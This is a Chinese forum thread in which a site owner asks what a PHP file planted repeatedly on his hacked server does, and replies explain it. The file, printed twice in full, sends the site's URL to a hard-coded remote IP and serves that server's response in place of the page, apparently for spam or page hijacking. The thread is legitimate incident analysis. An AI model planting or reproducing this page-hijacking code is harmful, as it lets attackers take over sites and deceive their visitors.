PHP代碼 請高手幫忙看下什麼意思

來源:互聯網
上載者:User
我網站好像被黑了,總有個SB天天來我網站根目錄放一個檔案,開啟後代碼如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;
}
?>

這什麼意圖?求高手分析下


回複討論(解決方案)

他把這個代碼放到你根目錄下,網站是不是訪問不了?

好像是他把你網站 原始地址 傳到他自己寫的一個方法裡面 用 host 參數接受 然後抓取你首頁的資訊吧

我網站沒異常(我還沒發現異常)

好像是他把你網站 原始地址 傳到他自己寫的一個方法裡面 用 host 參數接受 然後抓取你首頁的資訊吧



我網站沒異常(我還沒發現異常)

上面我的描述有問題,這個檔案不是放在更目錄,是放在根目錄的上一個目錄,

public_html 這個目錄裡面是網站的根目錄,他這個檔案和public_html放在同一個目錄,不知道他這樣對我的網站有什麼影響。 這SB隔天來次,已經刪了幾次了。
linux系統,目前使用權限設定為755,設定為644網站就打不開了,有什麼辦法不讓他上次檔案嗎?

$Remote_server."/index.html?host=".$host_name 這個地方他把你的網站地址傳過去 不知道幹什麼了 ,代碼在那個ip的伺服器上面 看不到。。。。。猜不來他要幹什麼。。。。。

伺服器 那方面的我不懂,等高手來把,


謝謝你

沒有異常?
set_time_limit(0); //永不逾時
header("Content-Type: text/html;charset=gb2312"); //指定瀏覽器字元集
$Remote_server = "http://122.114.126.160/"; //遠程網站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //構造當前頁的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //擷取瀏覽者的瀏覽器資訊
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //調用遠程網站
echo $Content_mb; //輸出遠程網站返回內容
exit(); //退出程式運行
function getHTTPPage($url) { //調用遠程網站函數
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //訪問遠程網站,你的url也傳過去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;
}

至於對方做了什嗎?目前尚不清楚
如果是在本地開發環境,返回的是廣告,正常的頁面沒有了
如果是運行中的網站,那麼若沒異樣的話,就說明潛在的威脅是很大的(CSRF攻擊)
僅是出一點廣告,倒是也無所謂

不管怎麼樣,先把對方的IP給禁掉吧,配置你的伺服器:禁止122.114.126.160的IP訪問你的網站。

把你頁面的內容替換了。
先看看程式那裡有漏洞讓人上傳檔案比較好,漏洞不封以後還是很多問題的。

沒有異常?
set_time_limit(0); //永不逾時
header("Content-Type: text/html;charset=gb2312"); //指定瀏覽器字元集
$Remote_server = "http://122.114.126.160/"; //遠程網站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //構造當前頁的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //擷取瀏覽者的瀏覽器資訊
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //調用遠程網站
echo $Content_mb; //輸出遠程網站返回內容
exit(); //退出程式運行
function getHTTPPage($url) { //調用遠程網站函數
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //訪問遠程網站,你的url也傳過去了
if (empty($html)) {
exit("

Connection Error!

");
}
return $html;
}

至於對方做了什嗎?目前尚不清楚
如果是在本地開發環境,返回的是廣告,正常的頁面沒有了
如果是運行中的網站,那麼若沒異樣的話,就說明潛在的威脅是很大的(CSRF攻擊)
僅是出一點廣告,倒是也無所謂




-------------------------
感謝

不管怎麼樣,先把對方的IP給禁掉吧,配置你的伺服器:禁止122.114.126.160的IP訪問你的網站。


-------------------------
感謝

把你頁面的內容替換了。
先看看程式那裡有漏洞讓人上傳檔案比較好,漏洞不封以後還是很多問題的。



-------------------------
感謝

我猜測他是想放到你public_html檔案夾下seo.php,如果有檔案就是替換掉裡面的檔案
結果/打錯了,變成還在外面的檔案夾

我猜測他是想放到你public_html檔案夾下seo.php,如果有檔案就是替換掉裡面的檔案
結果/打錯了,變成還在外面的檔案夾



謝謝 有可能
  • 聯繫我們

    該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

    如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.